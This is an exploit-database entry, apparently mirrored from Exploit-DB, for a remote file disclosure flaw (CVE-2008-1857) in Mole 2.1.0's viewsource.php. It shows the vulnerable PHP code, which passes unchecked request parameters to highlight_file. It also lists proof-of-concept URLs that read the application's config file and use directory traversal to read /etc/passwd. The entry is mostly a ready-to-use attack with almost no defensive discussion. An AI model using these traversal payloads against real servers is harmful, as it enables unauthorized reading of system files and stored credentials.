[] NeoSense
E X P L O I T S
title author type platform port cve id

Mole 2.1.0 - 'viewsource.php' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-04-06 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44274;CVE-2008-1857 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commole_2_1_0.zip
#  Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
#  Script : http://sourceforge.net/project/showfiles.php?group_id=164171
#  Vuln Code :
##############################################################################
#    <html>
#    <head>
#    <title>Mole: Template viewer</title>
#    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
#    </head>
#    <body>
#
#    <?php
#    $dirn = $_REQUEST['dirn']; <--- XxX
#    $fname = $_REQUEST['fname']; <--- XxX
#
#
#    highlight_file($dirn.$fname); <--- XxX
#    ?>
#
#    </body>
#    </html>
##############################################################################
#  POC :
#      /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
#      /mole_2_1_0/viewsource.php?fname=include/config.inc.php
#      /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
##############################################################################
#  Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr
##############################################################################

# milw0rm.com [2008-04-07]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.